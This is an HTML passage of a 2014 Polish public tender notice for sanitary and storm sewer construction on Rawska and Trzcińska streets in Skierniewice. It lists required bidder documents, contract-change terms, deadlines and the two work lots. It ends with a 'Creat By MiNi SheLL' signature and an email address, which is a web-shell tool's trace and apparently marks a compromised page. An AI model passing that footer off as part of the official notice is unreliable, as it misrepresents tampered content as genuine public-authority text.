<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 2 do SIWZ - formularz oferty. - Załącznik nr 3a cz. I i/lub 3b cz. II do SIWZ - wykaz cen. - Załącznik nr 6 do SIWZ - pisemne zobowiązanie do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. - Załącznik nr 9 do SIWZ - oświadczenie z art. 26 ust. 2d ustawy Prawo zamówień publicznych - Załącznik nr 10a 10b, 10c do SIWZ - projekt umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących postanowień umowy: 1) zmiany wymaganego terminu zakończenia realizacji przedmiotu umowy, 2) zmiany osób, przy pomocy których Wykonawca realizuje Umowę - wskazanych w ofercie, 3) zmiany osób, przy pomocy których Zamawiający realizuje Umowę, 4) zmiany sposobu realizacji Umowy, 5) innych zmian Umowy, w tym związanych ze zmianą powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizację przedmiotu Umowy. 2. Zmiany, o których mowa w ust. 1 mogą być dokonane na skutek zaistnienia następujących zdarzeń: 1) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy. 2) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez strony. 3) Wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania stosunku pracy, inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy), przy pomocy których Wykonawca realizuje przedmiot Umowy. Przedmiotowa zmiana jest możliwa pod warunkiem zaproponowania innych osób, spełniających na dzień składania ofert, warunki określone przez Zamawiającego w specyfikacji. 4) Wystąpienia konieczności zmiany osób, przy pomocy których Zamawiający realizuje przedmiot Umowy. 5) Wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego. 6) Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami: a) działania siły wyższej utrudniającej i uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami (przez siłę wyższą uważa się okoliczności będące poza rozsądną kontrolą każdej ze stron, które powstały po zawarciu Umowy, których żadna ze stron nie mogła przewidzieć, takie jak: wojna, działania wojenne, pożar, powódź, trzęsienie ziemi, inne klęski żywiołowe, niekorzystne warunki atmosferyczne, zarządzenie i zakazy wydane przez władze oraz strajki), b) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana numeru rachunku bankowego), c) zmiany danych teleadresowych, d) zmiana obowiązującej stawki VAT, e) rezygnacja przez Zamawiającego z realizacji części przedmiotu Umowy, f) wystąpienie innej okoliczności niemożliwej do przewidzenia w dniu zawarcia Umowy, uniemożliwiającej wykonanie Umowy w określonym pierwotnie terminie lub zakresie. 7) Przedłużenia terminu zakończenia robót, w przypadku gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji. 8) Wykonawca jest uprawniony do żądania zmiany Umowy w zakresie materiałów, parametrów technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu Umowy w następujących sytuacjach: a) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy, b) konieczności realizacji robót wynikających z wprowadzenia w dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego, wynikających z art. 36a ust. 1 Prawa Budowlanego, c) wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy, d) wystąpienia warunków terenu budowy odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych, e) konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodkan-skierniewice.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji WOD-KAN Sp. z o.o. Mokra Prawa 30, 96-100 Skierniewice..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2014 godzina 12:00, miejsce: Siedziba Zamawiającego -sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie 4 -Budowa kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej w Skierniewicach wchodzące w skład Projektu Uporządkowanie gospodarki ściekowej w mieście Skierniewice współfinansowanego przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cz. I -Budowa kanalizacji sanitarnej i deszczowej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej odcinek od Al. Niepodległości do ul. Kopernika i ulicy Trzcińskiej w Skierniewicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac przy budowie kanalizacji sanitarnej w ul. Rawskiej w Skierniewicach obejmuje odcinek od studni S2 bez studni w Al. Niepodległości do studni S14 wraz ze studnią tj.: - kanał sanitarny z rur kamionkowych Dn 400 mm, - przykanaliki sanitarne z rur PCV SN 8 Dn 160 mm, - studnie rewizyjne Dn 1200 mm z kręgów betonowych, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie nawierzchni z kostki brukowej betonowej na zjazdach , - odtworzenie chodników z kostki brukowej betonowej, - odtworzenie zieleni. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Włazy kanalizacyjne z logo ZWiK WOD-KAN zapewni Zamawiający. Zadanie dotyczące budowy kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ul. Rawskiej od Al. Niepodległości do ul. Kopernika w Skierniewicach - zadanie 4, wchodzi w skład Projektu Uporządkowanie gospodarki ściekowej w mieście Skierniewice współfinansowanego przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko. Zakres prac przy budowie kanalizacji sanitarnej w ul. Trzcińskiej w Skierniewicach obejmuje: - kanał sanitarny z rur PCV Dn 315 mm, - przykanaliki z rur PCV Dn 160 mm, 200, 250, 315, - studnie rewizyjne Dn 1200 mm z kręgów betonowych, - studnie rewizyjne Dn 425 mm z PCV, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie nawierzchni z kostki brukowej betonowej na zjazdach, - odtworzenie chodników z kostki brukowej betonowej, - odtworzenie zieleni. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Włazy kanalizacyjne z logo ZWiK WOD-KAN zapewni Zamawiający. Zakres prac przy budowie kanalizacji deszczowej w ul. Rawskiej i Trzcińskiej w Skierniewicach obejmuje: - kanał deszczowy z rur żelbetowych Dn 800 mm, - kanał deszczowy z rur żelbetowych Dn 600 mm, - kanał deszczowy z rur żelbetowych Dn 400 mm, - kanał deszczowy z rur żelbetowych Dn 315 mm, - przykanaliki z rur PVC SN 8 O 200 mm, - studnie rewizyjne Dn 1200 mm z kręgów betonowych, - studnie rewizyjne Dn 1400 mm z kręgów betonowych, - studnie rewizyjne Dn 1600 mm z kręgów betonowych, - podłączenie wpustów ściekowych z osadnikiem Dn 500, - przebudowę wodociągu, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie zjazdów, - odtworzenie chodników, - odtworzenie zieleni . Wykonawca wykona przedmiot zamówienia z materiałów własnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8, 45.23.31.42-6, 45.23.32.52-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cz. II: Budowa kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ulicy Rawskiej odcinek drogi wojewódzkiej od ul. Kopernika do ul. Granicznej w Skierniewicach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac w ul. Rawskiej w Skierniewicach na odcinku drogi wojewódzkiej od ul. Kopernika do ul. Granicznej obejmuje budowę: - kanału sanitarnego z rur kamionkowych O 400 mm, - przykanaliki sanitarne z rur PCV O 160 mm, - studni rewizyjnych O 1200 mm z kręgów betonowych, - odtworzenie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych, - odtworzenie nawierzchni z kostki brukowej betonowej na zjazdach, - odtworzenie chodników z kostki brukowej betonowej, - odtworzenie zieleni. Wykonawca wykona przedmiot zamówienia z materiałów własnych. Włazy kanalizacyjne z logo ZWiK WOD-KAN zapewni Zamawiający. Zadanie dotyczące budowy kanalizacji sanitarnej wraz z odtworzeniem pasa drogowego w ul. Rawskiej Skierniewicach-zadanie4,wchodzi w skład Projektu Uporządkowanie gospodarki ściekowej w mieście Skierniewice współfinansowanego przez Unię Europejską ze środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8, 45.23.31.42-6, 45.23.32.52-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com